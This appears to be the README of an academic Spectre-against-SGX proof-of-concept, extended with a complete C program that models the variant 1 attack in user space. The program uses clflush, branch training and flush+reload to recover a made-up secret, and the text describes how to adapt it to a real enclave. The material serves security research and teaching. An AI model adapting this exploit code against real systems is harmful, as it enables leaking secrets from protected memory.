Spectre attack against SGX enclave
Sample code demonstrating a Spectre-like attack against an Intel SGX enclave.
Given our ongoing research on Intel SGX in the LSDS group at Imperial College London, a question that occurred to us immediately on first hearing of the recent Meltdown and Spectre attacks was: what are the security implications of speculative execution side channels for Intel SGX enclaves?
This repository contains a proof-of-concept attack (SGXSpectre) showing that it is indeed possible to use a speculative execution side channel to leak data from an Intel SGX enclave.
The attack is conceptually similar to the conditional branch misprediction (variant 1) Spectre attack of Kocher et al. The main difference is that the secret data (`secret`), the victim function (`victim_function`) and the overflow array (`array1`) are moved inside the enclave. The attacker invokes `victim_function` through an ecall, passing it the index `x` that is used to index into `array1`; the bounds check on `x` is mispredicted, so the enclave speculatively reads `array1[x]` beyond the end of the array and uses the loaded byte as an index into a probe array whose cache state the attacker can observe.
- `SGXSpectre/main/main.c`: contains the untrusted code that creates the enclave and mounts the SGXSpectre attack.
- `SGXSpectre/enclave/enclave_attack.c`: contains the enclave secret data and the victim function.

The attack requires that the `array1_size` variable (used to verify that `x` is within the bounds of `array1`) is not cached when the victim function runs; if the bounds value hits in the cache, the branch resolves before the speculative out-of-bounds load can happen. For simplicity our proof-of-concept currently stores `array1_size` outside the enclave, allowing the attacker to flush it with a `clflush` instruction before each invocation of the victim function. In a real enclave this would be unsafe, since a bounds check must not depend on a value stored in untrusted memory. However, the attack could be adapted to keep `array1_size` inside the enclave by using an alternative mechanism to flush it before each invocation, e.g. evicting it by loading other data that maps to the same cache set.
For simplicity we also keep `array2`, the probe array whose entries are timed by the attacker (flush+reload), outside the enclave. As mentioned in the Spectre paper, a prime+probe attack on the shared cache could be used instead to infer the accesses to `array2` if it is not directly accessible to the attacker (e.g. if it is moved inside the enclave).
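The following stand-alone program is an added example that is not the SGXSpectre repository's code: it models, in plain user space, the layout the paragraphs above describe. `secret`, `array1` and `victim_function` stand in for the enclave side; `array1_size` and `array2` stand in for the untrusted side, so the "attacker" can `clflush` the bounds value before every call and flush+reload `array2` afterwards. The ecall is modelled as a direct function call, the probe stride and cache-hit threshold are assumed values taken from the usual Spectre proof-of-concept style, and the training/attack ratio (five in-bounds calls per out-of-bounds call) is likewise an assumption that may need tuning for a given core. On a non-x86 build the flush and timing helpers degrade to no-ops so the program still compiles, but the channel then leaks nothing.

```c
/* Added example (not the SGXSpectre project's code): user-space model of the
 * README's layout.  "Enclave side": secret, array1, victim_function.
 * "Untrusted side": array1_size, array2.  Constants are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static void flush_line(const void *p) { _mm_clflush(p); }
static uint64_t timed_load(const volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                          /* the load being timed */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#else
/* No user-space cache flush here: builds, but the timing channel is inert. */
static void flush_line(const void *p) { (void)p; }
static uint64_t timed_load(const volatile uint8_t *p) { (void)*p; return 0; }
#endif

#define PROBE_STRIDE 512          /* assumed: one probe entry per 512 bytes */
#define CACHE_HIT_THRESHOLD 80    /* assumed cycle threshold for a cache hit */

/* ---- modelled enclave side (enclave_attack.c in the real PoC) ---- */
static uint8_t array1[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
static const char secret[] = "Constructed enclave secret";  /* constructed */
static uint8_t temp;              /* sink so the compiler keeps the loads */

/* ---- modelled untrusted side (main.c in the real PoC) ---- */
static unsigned array1_size = 16; /* outside the "enclave", so it can be flushed */
static uint8_t array2[256 * PROBE_STRIDE];

/* Modelled ecall: the bounds check reads array1_size, which the attacker has
 * just flushed, so the branch is predicted and array1[x] is read speculatively. */
static void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * PROBE_STRIDE];
}

/* Branchless index selection for the training loop: rounds 0-4 of every six
 * pass an in-bounds index, round 5 passes the out-of-bounds one. */
size_t choose_x(int round, size_t training_x, size_t malicious_x) {
    size_t mask = (size_t)0 - (size_t)((round % 6) == 5);   /* all-ones or zero */
    return training_x ^ (mask & (malicious_x ^ training_x));
}

/* Return the two byte values with the highest hit counts. */
void pick_best(const int scores[256], int *best, int *second) {
    int b = 0, s = -1;
    for (int i = 1; i < 256; i++) {
        if (scores[i] > scores[b]) { s = b; b = i; }
        else if (s < 0 || scores[i] > scores[s]) s = i;
    }
    *best = b;
    *second = s;
}

/* Flush+reload recovery of the byte at array1[malicious_x]. */
int leak_byte(size_t malicious_x, int *second_guess) {
    static int scores[256];
    memset(scores, 0, sizeof scores);

    for (int tries = 0; tries < 999; tries++) {
        for (int i = 0; i < 256; i++) flush_line(&array2[i * PROBE_STRIDE]);
        size_t training_x = (size_t)tries % array1_size;

        for (int j = 29; j >= 0; j--) {
            flush_line(&array1_size);                  /* the README's precondition */
            for (volatile int z = 0; z < 100; z++) ;   /* let the flush land */
            victim_function(choose_x(j, training_x, malicious_x));
        }

        /* Probe in a scrambled order so the stride prefetcher does not help. */
        for (int i = 0; i < 256; i++) {
            int mix_i = ((i * 167) + 13) & 255;
            if (timed_load(&array2[mix_i * PROBE_STRIDE]) <= CACHE_HIT_THRESHOLD
                && mix_i != array1[training_x])
                scores[mix_i]++;
        }
    }
    int best, second;
    pick_best(scores, &best, &second);
    if (second_guess) *second_guess = second;
    return best;
}

int main(void) {
    memset(array2, 1, sizeof array2);   /* back array2 with real pages */
    for (size_t i = 0; i + 1 < sizeof secret; i++) {
        size_t malicious_x = (size_t)((const uint8_t *)secret + i - array1);
        int second;
        int c = leak_byte(malicious_x, &second);
        printf("offset %2zu: guess 0x%02x (%c), runner-up 0x%02x\n",
               i, c, (c > 31 && c < 127) ? c : '?', second);
    }
    return 0;
}
```

Moving `secret`, `array1` and `victim_function` into a real enclave changes only where those symbols live, not the attacker loop: the `clflush` of `array1_size` still works only because the variable sits in untrusted memory, which is exactly the simplification the README calls out. Keeping `array1_size` inside the enclave would require replacing `flush_line(&array1_size)` with an eviction set (loads to attacker-controlled addresses sharing its cache set), and moving `array2` inside would require replacing the `timed_load` probe with prime+probe on the shared cache.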
SGXSpectre is brought to you by Dan O'Keeffe, Divya Muthukumaran, Pierre-Louis Aublin, Florian Kelbert, Christian Priebe, Josh Lind, Huanzhou Zhu and Peter Pietzuch.